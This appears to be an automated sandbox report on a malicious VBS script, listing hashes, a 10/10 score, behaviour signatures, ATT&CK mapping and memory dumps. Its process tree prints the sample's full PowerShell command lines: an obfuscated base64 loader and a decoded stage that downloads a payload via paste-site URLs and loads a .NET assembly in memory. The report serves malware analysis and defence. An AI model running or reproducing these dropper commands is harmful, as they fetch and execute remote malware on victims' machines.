c1db9e5e071025c583f23a3223762422e6caa9c23ad1cbdfd0ce7a73d668ced0

General

Target

e775da7c0b55fe06c5de02e116243cb82155d6dc462c220280becaa5b8334123.vbs
Size

163KB
MD5

11f76a33d09caf69b8ade7f6f2410bf3
SHA1

e8058ec22549d5d144389b3feaa4f594df1f6d20
SHA256

e775da7c0b55fe06c5de02e116243cb82155d6dc462c220280becaa5b8334123
SHA512

59bd6405abff46700f10136ceb12a887d0403e3f61e7ba55f3787ade85595f7def2062bed401f9f304f04d9727cda87e0189f42980c90a1f195844e087c92a2c
SSDEEP

3072:iKfIfffo4fffff/oofTffgoff4ZyRKNP85LQG:m

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://textbin.net/raw/ezjmofz3s6

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

3 2700 powershell.exe
4 2700 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2980 powershell.exe
2700 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2980 powershell.exe
Token: SeDebugPrivilege 2700 powershell.exe

flow	pid	process
3	2700	powershell.exe
4	2700	powershell.exe

pid	process
2980	powershell.exe
2700	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	2700	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 2968 wrote to memory of 2980	2968	WScript.exe	powershell.exe
PID 2968 wrote to memory of 2980	2968	WScript.exe	powershell.exe
PID 2968 wrote to memory of 2980	2968	WScript.exe	powershell.exe
PID 2980 wrote to memory of 2700	2980	powershell.exe	powershell.exe
PID 2980 wrote to memory of 2700	2980	powershell.exe	powershell.exe
PID 2980 wrote to memory of 2700	2980	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e775da7c0b55fe06c5de02e116243cb82155d6dc462c220280becaa5b8334123.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒B3▒GQ▒ZQBj▒GQ▒I▒▒9▒C▒▒Jw▒w▒DI▒Mw▒n▒Ds▒J▒B5▒Gk▒b▒Bi▒G4▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bp▒G4▒cgBm▒HE▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwB0▒GU▒e▒B0▒GI▒aQBu▒C4▒bgBl▒HQ▒LwBy▒GE▒dw▒v▒GU▒egBq▒G0▒bwBm▒Ho▒MwBz▒DY▒Jw▒p▒C▒▒KQ▒g▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒Gk▒bgBy▒GY▒cQ▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒OQ▒4▒Dk▒OQ▒5▒Dk▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒WgB4▒Es▒S▒BH▒Cc▒KQ▒u▒Ek▒bgB2▒G8▒awBl▒Cg▒J▒Bu▒HU▒b▒Bs▒Cw▒I▒Bb▒G8▒YgBq▒GU▒YwB0▒Fs▒XQBd▒C▒▒K▒▒n▒GI▒YQBp▒Gw▒bwBq▒Hg▒a▒Bt▒FQ▒UQB4▒C8▒Z▒Bh▒G8▒b▒Bu▒Hc▒bwBk▒C8▒bQBv▒GM▒LgBv▒Gk▒ZQB0▒HM▒YQBw▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒eQBp▒Gw▒YgBu▒C▒▒L▒▒g▒Cc▒a▒Bw▒GY▒VwBa▒Ew▒Jw▒s▒C▒▒J▒B3▒GQ▒ZQBj▒GQ▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\e775da7c0b55fe06c5de02e116243cb82155d6dc462c220280becaa5b8334123.vbs');powershell -command $KByHL;
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$wdecd = '023';$yilbn = 'C:\Users\Admin\AppData\Local\Temp\e775da7c0b55fe06c5de02e116243cb82155d6dc462c220280becaa5b8334123.vbs';[Byte[]] $inrfq = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) );[system.AppDomain]::CurrentDomain.Load($inrfq).GetType('ClassLibrary989999.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('bailojxhmTQx/daolnwod/moc.oietsap//:sptth' , $yilbn , 'hpfWZL', $wdecd, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\26D73G9LDV24ZD9EE0MJ.temp
Filesize
7KB

MD5
b2d270c97c654299cf8306f4ecca927d

SHA1
6cf76945d62ac674e89a57cd5b2d17f8f1e34bba

SHA256
92df746abf7b392a2d54427b8b5e97256ddd7bd7c98cc75f285b802855fa23fb

SHA512
074271a490d8f0cfb76bbf90401e3797edb0c6084f5e20f3249a0a8f69ac6303de2c81e461ab31b689192b97b15fa9f37351ad05836c4d1dc07a6d58a97729a5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
b2d270c97c654299cf8306f4ecca927d

SHA1
6cf76945d62ac674e89a57cd5b2d17f8f1e34bba

SHA256
92df746abf7b392a2d54427b8b5e97256ddd7bd7c98cc75f285b802855fa23fb

SHA512
074271a490d8f0cfb76bbf90401e3797edb0c6084f5e20f3249a0a8f69ac6303de2c81e461ab31b689192b97b15fa9f37351ad05836c4d1dc07a6d58a97729a5

Download Submit
memory/2700-19-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2700-17-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

Filesize
9.6MB

Download
memory/2700-23-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

Filesize
9.6MB

Download
memory/2700-22-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2700-21-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2700-20-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2700-18-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

Filesize
9.6MB

Download
memory/2980-5-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2980-7-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/2980-6-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

Filesize
9.6MB

Download
memory/2980-4-0x000000001B340000-0x000000001B622000-memory.dmp

Filesize
2.9MB

Download
memory/2980-11-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/2980-10-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

Filesize
9.6MB

Download
memory/2980-9-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/2980-8-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/2980-24-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing